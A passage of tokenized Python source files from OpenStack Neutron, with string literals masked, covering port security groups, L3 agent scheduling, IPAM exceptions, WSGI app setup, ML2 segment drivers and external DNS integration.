<EOL> tenant_id = port . get ( '<STR_LIT>' ) <EOL> if tenant_id : <EOL> filters [ '<STR_LIT>' ] = [ tenant_id ] <EOL> valid_groups = set ( g [ '<STR_LIT:id>' ] for g in <EOL> self . get_security_groups ( context , fields = [ '<STR_LIT:id>' ] , <EOL> filters = filters ) ) <EOL> requested_groups = set ( port_sg ) <EOL> port_sg_missing = requested_groups - valid_groups <EOL> if port_sg_missing : <EOL> raise ext_sg . SecurityGroupNotFound ( id = '<STR_LIT:U+002CU+0020>' . join ( port_sg_missing ) ) <EOL> return requested_groups <EOL> def _ensure_default_security_group_on_port ( self , context , port ) : <EOL> port = port [ '<STR_LIT:port>' ] <EOL> if port . get ( '<STR_LIT>' ) and utils . is_port_trusted ( port ) : <EOL> return <EOL> default_sg = self . _ensure_default_security_group ( context , <EOL> port [ '<STR_LIT>' ] ) <EOL> if not validators . is_attr_set ( port . get ( ext_sg . SECURITYGROUPS ) ) : <EOL> port [ ext_sg . SECURITYGROUPS ] = [ default_sg ] <EOL> def _check_update_deletes_security_groups ( self , port ) : <EOL> """<STR_LIT>""" <EOL> if ( ext_sg . SECURITYGROUPS in port [ '<STR_LIT:port>' ] and <EOL> not ( validators . is_attr_set ( port [ '<STR_LIT:port>' ] [ ext_sg . SECURITYGROUPS ] ) <EOL> and port [ '<STR_LIT:port>' ] [ ext_sg . SECURITYGROUPS ] != [ ] ) ) : <EOL> return True <EOL> return False <EOL> def _check_update_has_security_groups ( self , port ) : <EOL> """<STR_LIT>""" <EOL> if ( ext_sg . SECURITYGROUPS in port [ '<STR_LIT:port>' ] and <EOL> ( validators . is_attr_set ( port [ '<STR_LIT:port>' ] [ ext_sg . SECURITYGROUPS ] ) and <EOL> port [ '<STR_LIT:port>' ] [ ext_sg . SECURITYGROUPS ] != [ ] ) ) : <EOL> return True <EOL> return False <EOL> def update_security_group_on_port ( self , context , id , port , <EOL> original_port , updated_port ) : <EOL> """<STR_LIT>""" <EOL> need_notify = False <EOL> port_updates = port [ '<STR_LIT:port>' ] <EOL> if ( ext_sg . SECURITYGROUPS in port_updates and <EOL> not utils . compare_elements ( <EOL> original_port . get ( ext_sg . SECURITYGROUPS ) , <EOL> port_updates [ ext_sg . SECURITYGROUPS ] ) ) : <EOL> port_updates [ ext_sg . SECURITYGROUPS ] = ( <EOL> self . _get_security_groups_on_port ( context , port ) ) <EOL> self . _delete_port_security_group_bindings ( context , id ) <EOL> self . _process_port_create_security_group ( <EOL> context , <EOL> updated_port , <EOL> port_updates [ ext_sg . SECURITYGROUPS ] ) <EOL> need_notify = True <EOL> else : <EOL> updated_port [ ext_sg . SECURITYGROUPS ] = ( <EOL> original_port [ ext_sg . SECURITYGROUPS ] ) <EOL> return need_notify </s>
<s> import abc <EOL> from neutron_lib import constants <EOL> from neutron_lib import exceptions <EOL> from oslo_log import log as logging <EOL> import webob . exc <EOL> from neutron . _i18n import _ , _LE <EOL> from neutron . api import extensions <EOL> from neutron . api . v2 import base <EOL> from neutron . api . v2 import resource <EOL> from neutron . common import rpc as n_rpc <EOL> from neutron . extensions import agent <EOL> from neutron import manager <EOL> from neutron . plugins . common import constants as service_constants <EOL> from neutron import policy <EOL> from neutron import wsgi <EOL> LOG = logging . getLogger ( __name__ ) <EOL> L3_ROUTER = '<STR_LIT>' <EOL> L3_ROUTERS = L3_ROUTER + '<STR_LIT:s>' <EOL> L3_AGENT = '<STR_LIT>' <EOL> L3_AGENTS = L3_AGENT + '<STR_LIT:s>' <EOL> class RouterSchedulerController ( wsgi . Controller ) : <EOL> def get_plugin ( self ) : <EOL> plugin = manager . NeutronManager . get_service_plugins ( ) . get ( <EOL> service_constants . L3_ROUTER_NAT ) <EOL> if not plugin : <EOL> LOG . error ( _LE ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> msg = _ ( '<STR_LIT>' ) <EOL> raise webob . exc . HTTPNotFound ( msg ) <EOL> return plugin <EOL> def index ( self , request , ** kwargs ) : <EOL> plugin = self . get_plugin ( ) <EOL> policy . enforce ( request . context , <EOL> "<STR_LIT>" % L3_ROUTERS , <EOL> { } ) <EOL> return plugin . list_routers_on_l3_agent ( <EOL> request . context , kwargs [ '<STR_LIT>' ] ) <EOL> def create ( self , request , body , ** kwargs ) : <EOL> plugin = self . get_plugin ( ) <EOL> policy . enforce ( request . context , <EOL> "<STR_LIT>" % L3_ROUTER , <EOL> { } ) <EOL> agent_id = kwargs [ '<STR_LIT>' ] <EOL> router_id = body [ '<STR_LIT>' ] <EOL> result = plugin . add_router_to_l3_agent ( request . context , agent_id , <EOL> router_id ) <EOL> notify ( request . context , '<STR_LIT>' , router_id , agent_id ) <EOL> return result <EOL> def delete ( self , request , id , ** kwargs ) : <EOL> plugin = self . get_plugin ( ) <EOL> policy . enforce ( request . context , <EOL> "<STR_LIT>" % L3_ROUTER , <EOL> { } ) <EOL> agent_id = kwargs [ '<STR_LIT>' ] <EOL> result = plugin . remove_router_from_l3_agent ( request . context , agent_id , <EOL> id ) <EOL> notify ( request . context , '<STR_LIT>' , id , agent_id ) <EOL> return result <EOL> class L3AgentsHostingRouterController ( wsgi . Controller ) : <EOL> def get_plugin ( self ) : <EOL> plugin = manager . NeutronManager . get_service_plugins ( ) . get ( <EOL> service_constants . L3_ROUTER_NAT ) <EOL> if not plugin : <EOL> LOG . error ( _LE ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> msg = _ ( '<STR_LIT>' ) <EOL> raise webob . exc . HTTPNotFound ( msg ) <EOL> return plugin <EOL> def index ( self , request , ** kwargs ) : <EOL> plugin = self . get_plugin ( ) <EOL> policy . enforce ( request . context , <EOL> "<STR_LIT>" % L3_AGENTS , <EOL> { } ) <EOL> return plugin . list_l3_agents_hosting_router ( <EOL> request . context , kwargs [ '<STR_LIT>' ] ) <EOL> class L3agentscheduler ( extensions . ExtensionDescriptor ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def get_name ( cls ) : <EOL> return "<STR_LIT>" <EOL> @ classmethod <EOL> def get_alias ( cls ) : <EOL> return constants . L3_AGENT_SCHEDULER_EXT_ALIAS <EOL> @ classmethod <EOL> def get_description ( cls ) : <EOL> return "<STR_LIT>" <EOL> @ classmethod <EOL> def get_updated ( cls ) : <EOL> return "<STR_LIT>" <EOL> @ classmethod <EOL> def get_resources ( cls ) : <EOL> """<STR_LIT>""" <EOL> exts = [ ] <EOL> parent = dict ( member_name = "<STR_LIT>" , <EOL> collection_name = "<STR_LIT>" ) <EOL> controller = resource . Resource ( RouterSchedulerController ( ) , <EOL> base . FAULT_MAP ) <EOL> exts . append ( extensions . ResourceExtension ( <EOL> L3_ROUTERS , controller , parent ) ) <EOL> parent = dict ( member_name = "<STR_LIT>" , <EOL> collection_name = "<STR_LIT>" ) <EOL> controller = resource . Resource ( L3AgentsHostingRouterController ( ) , <EOL> base . FAULT_MAP ) <EOL> exts . append ( extensions . ResourceExtension ( <EOL> L3_AGENTS , controller , parent ) ) <EOL> return exts <EOL> def get_extended_resources ( self , version ) : <EOL> return { } <EOL> class InvalidL3Agent ( agent . AgentNotFound ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> class RouterHostedByL3Agent ( exceptions . Conflict ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class RouterSchedulingFailed ( exceptions . Conflict ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class RouterReschedulingFailed ( exceptions . Conflict ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class RouterL3AgentMismatch ( exceptions . Conflict ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class DVRL3CannotAssignToDvrAgent ( exceptions . Conflict ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class DVRL3CannotRemoveFromDvrAgent ( exceptions . Conflict ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class L3AgentSchedulerPluginBase ( object ) : <EOL> """<STR_LIT>""" <EOL> @ abc . abstractmethod <EOL> def add_router_to_l3_agent ( self , context , id , router_id ) : <EOL> pass <EOL> @ abc . abstractmethod <EOL> def remove_router_from_l3_agent ( self , context , id , router_id ) : <EOL> pass <EOL> @ abc . abstractmethod <EOL> def list_routers_on_l3_agent ( self , context , id ) : <EOL> pass <EOL> @ abc . abstractmethod <EOL> def list_l3_agents_hosting_router ( self , context , router_id ) : <EOL> pass <EOL> def notify ( context , action , router_id , agent_id ) : <EOL> info = { '<STR_LIT:id>' : agent_id , '<STR_LIT>' : router_id } <EOL> notifier = n_rpc . get_notifier ( '<STR_LIT>' ) <EOL> notifier . info ( context , action , { '<STR_LIT>' : info } ) </s>
<s> from neutron_lib import exceptions <EOL> from neutron . _i18n import _ <EOL> class InvalidSubnetRequestType ( exceptions . BadRequest ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> class AddressCalculationFailure ( exceptions . NeutronException ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class InvalidAddressType ( exceptions . NeutronException ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> class IpAddressAllocationNotFound ( exceptions . NeutronException ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class IpAddressAlreadyAllocated ( exceptions . Conflict ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> class InvalidIpForSubnet ( exceptions . BadRequest ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> class InvalidAddressRequest ( exceptions . BadRequest ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class InvalidSubnetRequest ( exceptions . BadRequest ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class AllocationOnAutoAddressSubnet ( exceptions . NeutronException ) : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class IpAddressGenerationFailure ( exceptions . Conflict ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> class IPAllocationFailed ( exceptions . NeutronException ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> class IpamAvailabilityRangeNoChanges ( exceptions . NeutronException ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> class IpamValueInvalid ( exceptions . Conflict ) : <EOL> def __init__ ( self , message = None ) : <EOL> self . message = message <EOL> super ( IpamValueInvalid , self ) . __init__ ( ) </s>
<s> from keystonemiddleware import auth_token <EOL> from neutron_lib import exceptions as n_exc <EOL> from oslo_config import cfg <EOL> from oslo_middleware import cors <EOL> from oslo_middleware import request_id <EOL> import pecan <EOL> from neutron . api import versions <EOL> from neutron . pecan_wsgi import hooks <EOL> from neutron . pecan_wsgi import startup <EOL> CONF = cfg . CONF <EOL> CONF . import_opt ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> CONF . import_opt ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def setup_app ( * args , ** kwargs ) : <EOL> config = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:port>' : CONF . bind_port , <EOL> '<STR_LIT:host>' : CONF . bind_host <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:root>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> } <EOL> } <EOL> pecan_config = pecan . configuration . conf_from_dict ( config ) <EOL> app_hooks = [ <EOL> hooks . ExceptionTranslationHook ( ) , <EOL> hooks . ContextHook ( ) , <EOL> hooks . BodyValidationHook ( ) , <EOL> hooks . OwnershipValidationHook ( ) , <EOL> hooks . QuotaEnforcementHook ( ) , <EOL> hooks . NotifierHook ( ) , <EOL> hooks . PolicyHook ( ) , <EOL> ] <EOL> app = pecan . make_app ( <EOL> pecan_config . app . root , <EOL> debug = False , <EOL> wrap_app = _wrap_app , <EOL> force_canonical = False , <EOL> hooks = app_hooks , <EOL> guess_content_type_from_ext = True <EOL> ) <EOL> startup . initialize_all ( ) <EOL> return app <EOL> def _wrap_app ( app ) : <EOL> app = request_id . RequestId ( app ) <EOL> if cfg . CONF . auth_strategy == '<STR_LIT>' : <EOL> pass <EOL> elif cfg . CONF . auth_strategy == '<STR_LIT>' : <EOL> app = auth_token . AuthProtocol ( app , { } ) <EOL> else : <EOL> raise n_exc . InvalidConfigurationOption ( <EOL> opt_name = '<STR_LIT>' , opt_value = cfg . CONF . auth_strategy ) <EOL> app = versions . Versions ( app ) <EOL> app = cors . CORS ( app , cfg . CONF ) <EOL> app . set_latent ( <EOL> allow_headers = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> allow_methods = [ '<STR_LIT:GET>' , '<STR_LIT>' , '<STR_LIT:POST>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> expose_headers = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> ) <EOL> return app </s>
<s> import random <EOL> from oslo_config import cfg <EOL> from oslo_db import exception as db_exc <EOL> from oslo_log import log <EOL> from neutron . _i18n import _LE <EOL> from neutron . common import exceptions as exc <EOL> from neutron . common import utils <EOL> from neutron . plugins . common import utils as p_utils <EOL> from neutron . plugins . ml2 import driver_api as api <EOL> LOG = log . getLogger ( __name__ ) <EOL> IDPOOL_SELECT_SIZE = <NUM_LIT:100> <EOL> class BaseTypeDriver ( api . TypeDriver ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> try : <EOL> self . physnet_mtus = utils . parse_mappings ( <EOL> cfg . CONF . ml2 . physical_network_mtus , unique_values = False <EOL> ) <EOL> except Exception as e : <EOL> LOG . error ( _LE ( "<STR_LIT>" ) , e ) <EOL> self . physnet_mtus = [ ] <EOL> def get_mtu ( self , physical_network = None ) : <EOL> return p_utils . get_deployment_physnet_mtu ( ) <EOL> class SegmentTypeDriver ( BaseTypeDriver ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model ) : <EOL> super ( SegmentTypeDriver , self ) . __init__ ( ) <EOL> self . model = model <EOL> self . primary_keys = set ( dict ( model . __table__ . columns ) ) <EOL> self . primary_keys . remove ( "<STR_LIT>" ) <EOL> def allocate_fully_specified_segment ( self , session , ** raw_segment ) : <EOL> """<STR_LIT>""" <EOL> network_type = self . get_type ( ) <EOL> try : <EOL> with session . begin ( subtransactions = True ) : <EOL> alloc = ( session . query ( self . model ) . filter_by ( ** raw_segment ) . <EOL> first ( ) ) <EOL> if alloc : <EOL> if alloc . allocated : <EOL> return <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , <EOL> "<STR_LIT>" : raw_segment } ) <EOL> count = ( session . query ( self . model ) . <EOL> filter_by ( allocated = False , ** raw_segment ) . <EOL> update ( { "<STR_LIT>" : True } ) ) <EOL> if count : <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , <EOL> "<STR_LIT>" : raw_segment } ) <EOL> return alloc <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , <EOL> "<STR_LIT>" : raw_segment } ) <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , "<STR_LIT>" : raw_segment } ) <EOL> alloc = self . model ( allocated = True , ** raw_segment ) <EOL> alloc . save ( session ) <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , "<STR_LIT>" : raw_segment } ) <EOL> except db_exc . DBDuplicateEntry : <EOL> alloc = None <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , "<STR_LIT>" : raw_segment } ) <EOL> return alloc <EOL> def allocate_partially_specified_segment ( self , session , ** filters ) : <EOL> """<STR_LIT>""" <EOL> network_type = self . get_type ( ) <EOL> with session . begin ( subtransactions = True ) : <EOL> select = ( session . query ( self . model ) . <EOL> filter_by ( allocated = False , ** filters ) ) <EOL> allocs = select . limit ( IDPOOL_SELECT_SIZE ) . all ( ) <EOL> if not allocs : <EOL> return <EOL> alloc = random . choice ( allocs ) <EOL> raw_segment = dict ( ( k , alloc [ k ] ) for k in self . primary_keys ) <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , <EOL> "<STR_LIT>" : raw_segment } ) <EOL> count = ( session . query ( self . model ) . <EOL> filter_by ( allocated = False , ** raw_segment ) . <EOL> update ( { "<STR_LIT>" : True } ) ) <EOL> if count : <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , <EOL> "<STR_LIT>" : raw_segment } ) <EOL> return alloc <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { "<STR_LIT:type>" : network_type , <EOL> "<STR_LIT>" : raw_segment } ) <EOL> raise db_exc . RetryRequest ( <EOL> exc . NoNetworkFoundInMaximumAllowedAttempts ( ) ) </s>
<s> import sys <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from oslo_utils import importutils <EOL> from neutron . common import config as common_config <EOL> from neutron . common import utils as n_utils <EOL> LOG = logging . getLogger ( __name__ ) <EOL> cfg . CONF . import_group ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> _main_modules = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> } <EOL> def main ( ) : <EOL> common_config . init ( sys . argv [ <NUM_LIT:1> : ] ) <EOL> driver_name = cfg . CONF . OVS . of_interface <EOL> mod_name = _main_modules [ driver_name ] <EOL> mod = importutils . import_module ( mod_name ) <EOL> mod . init_config ( ) <EOL> common_config . setup_logging ( ) <EOL> n_utils . log_opt_values ( LOG ) <EOL> mod . main ( ) </s>
<s> from neutron_lib . api import validators <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from neutron . _i18n import _LE , _LI <EOL> from neutron . callbacks import events <EOL> from neutron . callbacks import registry <EOL> from neutron . callbacks import resources <EOL> from neutron . db import dns_db <EOL> from neutron . db import models_v2 <EOL> from neutron . extensions import dns <EOL> from neutron import manager <EOL> from neutron . plugins . common import utils as plugin_utils <EOL> from neutron . plugins . ml2 import db <EOL> from neutron . plugins . ml2 import driver_api as api <EOL> from neutron . services . externaldns import driver <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class DNSExtensionDriver ( api . ExtensionDriver ) : <EOL> _supported_extension_alias = '<STR_LIT>' <EOL> @ property <EOL> def extension_alias ( self ) : <EOL> return self . _supported_extension_alias <EOL> def process_create_network ( self , plugin_context , request_data , db_data ) : <EOL> dns_domain = request_data . get ( dns . DNSDOMAIN ) <EOL> if not validators . is_attr_set ( dns_domain ) : <EOL> return <EOL> if dns_domain : <EOL> plugin_context . session . add ( dns_db . NetworkDNSDomain ( <EOL> network_id = db_data [ '<STR_LIT:id>' ] , dns_domain = dns_domain ) ) <EOL> db_data [ dns . DNSDOMAIN ] = dns_domain <EOL> def process_update_network ( self , plugin_context , request_data , db_data ) : <EOL> new_value = request_data . get ( dns . DNSDOMAIN ) <EOL> if not validators . is_attr_set ( new_value ) : <EOL> return <EOL> current_dns_domain = db_data . get ( dns . DNSDOMAIN ) <EOL> if current_dns_domain == new_value : <EOL> return <EOL> net_id = db_data [ '<STR_LIT:id>' ] <EOL> if current_dns_domain : <EOL> net_dns_domain = plugin_context . session . query ( <EOL> dns_db . NetworkDNSDomain ) . filter_by ( network_id = net_id ) . one ( ) <EOL> if new_value : <EOL> net_dns_domain [ '<STR_LIT>' ] = new_value <EOL> db_data [ dns . DNSDOMAIN ] = new_value <EOL> else : <EOL> plugin_context . session . delete ( net_dns_domain ) <EOL> db_data [ dns . DNSDOMAIN ] = '<STR_LIT>' <EOL> elif new_value : <EOL> plugin_context . session . add ( dns_db . NetworkDNSDomain ( <EOL> network_id = net_id , dns_domain = new_value ) ) <EOL> db_data [ dns . DNSDOMAIN ] = new_value <EOL> def process_create_port ( self , plugin_context , request_data , db_data ) : <EOL> if not request_data [ dns . DNSNAME ] : <EOL> return <EOL> network = self . _get_network ( plugin_context , db_data [ '<STR_LIT>' ] ) <EOL> if not network [ dns . DNSDOMAIN ] : <EOL> return <EOL> if self . external_dns_not_needed ( plugin_context , network ) : <EOL> return <EOL> plugin_context . session . add ( dns_db . PortDNS ( <EOL> port_id = db_data [ '<STR_LIT:id>' ] , <EOL> current_dns_name = request_data [ dns . DNSNAME ] , <EOL> current_dns_domain = network [ dns . DNSDOMAIN ] , <EOL> previous_dns_name = '<STR_LIT>' , previous_dns_domain = '<STR_LIT>' ) ) <EOL> def process_update_port ( self , plugin_context , request_data , db_data ) : <EOL> dns_name = request_data . get ( dns . DNSNAME ) <EOL> has_fixed_ips = '<STR_LIT>' in request_data <EOL> if dns_name is None and not has_fixed_ips : <EOL> return <EOL> network = self . _get_network ( plugin_context , db_data [ '<STR_LIT>' ] ) <EOL> if not network [ dns . DNSDOMAIN ] : <EOL> return <EOL> if self . external_dns_not_needed ( plugin_context , network ) : <EOL> return <EOL> dns_domain = network [ dns . DNSDOMAIN ] <EOL> dns_data_db = plugin_context . session . query ( dns_db . PortDNS ) . filter_by ( <EOL> port_id = db_data [ '<STR_LIT:id>' ] ) . one_or_none ( ) <EOL> if dns_data_db : <EOL> is_dns_name_changed = ( dns_name is not None and <EOL> dns_data_db [ '<STR_LIT>' ] != dns_name ) <EOL> if is_dns_name_changed or ( has_fixed_ips and <EOL> dns_data_db [ '<STR_LIT>' ] ) : <EOL> dns_data_db [ '<STR_LIT>' ] = ( <EOL> dns_data_db [ '<STR_LIT>' ] ) <EOL> dns_data_db [ '<STR_LIT>' ] = ( <EOL> dns_data_db [ '<STR_LIT>' ] ) <EOL> if is_dns_name_changed : <EOL> dns_data_db [ '<STR_LIT>' ] = dns_name <EOL> if dns_name : <EOL> dns_data_db [ '<STR_LIT>' ] = dns_domain <EOL> else : <EOL> dns_data_db [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return <EOL> if dns_name : <EOL> plugin_context . session . add ( dns_db . PortDNS ( <EOL> port_id = db_data [ '<STR_LIT:id>' ] , <EOL> current_dns_name = dns_name , <EOL> current_dns_domain = dns_domain , <EOL> previous_dns_name = '<STR_LIT>' , previous_dns_domain = '<STR_LIT>' ) ) <EOL> def external_dns_not_needed ( self , context , network ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def extend_network_dict ( self , session , db_data , response_data ) : <EOL> response_data [ dns . DNSDOMAIN ] = '<STR_LIT>' <EOL> if db_data . dns_domain : <EOL> response_data [ dns . DNSDOMAIN ] = db_data . dns_domain [ dns . DNSDOMAIN ] <EOL> return response_data <EOL> def extend_port_dict ( self , session , db_data , response_data ) : <EOL> response_data [ dns . DNSNAME ] = db_data [ dns . DNSNAME ] <EOL> return response_data <EOL> def _get_network ( self , context , network_id ) : <EOL> plugin = manager . NeutronManager . get_plugin ( ) <EOL> return plugin . get_network ( context , network_id ) <EOL> class DNSExtensionDriverML2 ( DNSExtensionDriver ) : <EOL> def initialize ( self ) : <EOL> LOG . info ( _LI ( "<STR_LIT>" ) ) <EOL> def _is_tunnel_tenant_network ( self , provider_net ) : <EOL> if provider_net [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> tunnel_ranges = cfg . CONF . ml2_type_geneve . vni_ranges <EOL> elif provider_net [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> tunnel_ranges = cfg . CONF . ml2_type_vxlan . vni_ranges <EOL> else : <EOL> tunnel_ranges = cfg . CONF . ml2_type_gre . tunnel_id_ranges <EOL> segmentation_id = int ( provider_net [ '<STR_LIT>' ] ) <EOL> for entry in tunnel_ranges : <EOL> entry = entry . strip ( ) <EOL> tun_min , tun_max = entry . split ( '<STR_LIT::>' ) <EOL> tun_min = tun_min . strip ( ) <EOL> tun_max = tun_max . strip ( ) <EOL> return int ( tun_min ) <= segmentation_id <= int ( tun_max ) <EOL> def _is_vlan_tenant_network ( self , provider_net ) : <EOL> network_vlan_ranges = plugin_utils . parse_network_vlan_ranges ( <EOL> cfg . CONF . ml2_type_vlan . network_vlan_ranges ) <EOL> vlan_ranges = network_vlan_ranges [ provider_net [ '<STR_LIT>' ] ] <EOL> if not vlan_ranges : <EOL> return False <EOL> segmentation_id = int ( provider_net [ '<STR_LIT>' ] ) <EOL> for vlan_range in vlan_ranges : <EOL> if vlan_range [ <NUM_LIT:0> ] <= segmentation_id <= vlan_range [ <NUM_LIT:1> ] : <EOL> return True <EOL> def external_dns_not_needed ( self , context , network ) : <EOL> dns_driver = _get_dns_driver ( ) <EOL> if not dns_driver : <EOL> return True <EOL> if network [ '<STR_LIT>' ] : <EOL> return True <EOL> segments = db . get_network_segments ( context . session , network [ '<STR_LIT:id>' ] ) <EOL> if len ( segments ) > <NUM_LIT:1> : <EOL> return False <EOL> provider_net = segments [ <NUM_LIT:0> ] <EOL> if provider_net [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> return True <EOL> if provider_net [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> return False <EOL> if provider_net [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> return self . _is_vlan_tenant_network ( provider_net ) <EOL> if provider_net [ '<STR_LIT>' ] in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return self . _is_tunnel_tenant_network ( provider_net ) <EOL> return True <EOL> DNS_DRIVER = None <EOL> def _get_dns_driver ( ) : <EOL> global DNS_DRIVER <EOL> if DNS_DRIVER : <EOL> return DNS_DRIVER <EOL> if not cfg . CONF . external_dns_driver : <EOL> return <EOL> try : <EOL> DNS_DRIVER = driver . ExternalDNSService . get_instance ( ) <EOL> LOG . debug ( "<STR_LIT>" , <EOL> cfg . CONF . external_dns_driver ) <EOL> return DNS_DRIVER <EOL> except ImportError : <EOL> LOG . exception ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> raise dns . ExternalDNSDriverNotFound ( <EOL> driver = cfg . CONF . external_dns_driver ) <EOL> def _create_port_in_external_dns_service ( resource , event , trigger , ** kwargs ) : <EOL> dns_driver = _get_dns_driver ( ) <EOL> if not dns_driver : <EOL> return <EOL> context = kwargs [ '<STR_LIT>' ] <EOL> port = kwargs [ '<STR_LIT:port>' ] <EOL> dns_data_db = context . session . query ( dns_db . PortDNS ) . filter_by ( <EOL> port_id = port [ '<STR_LIT:id>' ] ) . one_or_none ( ) <EOL> if not dns_data_db : <EOL> return <EOL> records = [ ip [ '<STR_LIT>' ] for ip in port [ '<STR_LIT>' ] ] <EOL> _send_data_to_external_dns_service ( context , dns_driver , <EOL> dns_data_db [ '<STR_LIT>' ] , <EOL> dns_data_db [ '<STR_LIT>' ] , <EOL> records ) <EOL> def _send_data_to_external_dns_service ( context , dns_driver , dns_domain , <EOL> dns_name , records ) : <EOL> try : <EOL> dns_driver . create_record_set ( context , dns_domain , dns_name , records ) <EOL> except ( dns . DNSDomainNotFound , dns . DuplicateRecordSet ) as e : <EOL> LOG . exception ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> % { "<STR_LIT:name>" : dns_name , <EOL> "<STR_LIT>" : dns_domain , <EOL> "<STR_LIT:message>" : e . msg } ) <EOL> def _remove_data_from_external_dns_service ( context , dns_driver , dns_domain , <EOL> dns_name , records ) : <EOL> try : <EOL> dns_driver . delete_record_set ( context , dns_domain , dns_name , records ) <EOL> except ( dns . DNSDomainNotFound , dns . DuplicateRecordSet ) as e : <EOL> LOG . exception ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> % { "<STR_LIT:name>" : dns_name , <EOL> "<STR_LIT>" : dns_domain , <EOL> "<STR_LIT:message>" : e . msg , <EOL> "<STR_LIT>" : '<STR_LIT:U+002CU+0020>' . join ( records ) } ) <EOL> def _update_port_in_external_dns_service ( resource , event , trigger , ** kwargs ) : <EOL> dns_driver = _get_dns_driver ( ) <EOL> if not dns_driver : <EOL> return <EOL> context = kwargs [ '<STR_LIT>' ] <EOL> updated_port = kwargs [ '<STR_LIT:port>' ] <EOL> original_port = kwargs . get ( '<STR_LIT>' ) <EOL> if not original_port : <EOL> return <EOL> original_ips = [ ip [ '<STR_LIT>' ] for ip in original_port [ '<STR_LIT>' ] ] <EOL> updated_ips = [ ip [ '<STR_LIT>' ] for ip in updated_port [ '<STR_LIT>' ] ] <EOL> if ( updated_port [ dns . DNSNAME ] == original_port [ dns . DNSNAME ] and <EOL> set ( original_ips ) == set ( updated_ips ) ) : <EOL> return <EOL> if ( updated_port [ dns . DNSNAME ] == original_port [ dns . DNSNAME ] and <EOL> not original_port [ dns . DNSNAME ] ) : <EOL> return <EOL> dns_data_db = context . session . query ( dns_db . PortDNS ) . filter_by ( <EOL> port_id = updated_port [ '<STR_LIT:id>' ] ) . one_or_none ( ) <EOL> if not dns_data_db : <EOL> return <EOL> if dns_data_db [ '<STR_LIT>' ] : <EOL> _remove_data_from_external_dns_service ( <EOL> context , dns_driver , dns_data_db [ '<STR_LIT>' ] , <EOL> dns_data_db [ '<STR_LIT>' ] , original_ips ) <EOL> if dns_data_db [ '<STR_LIT>' ] : <EOL> 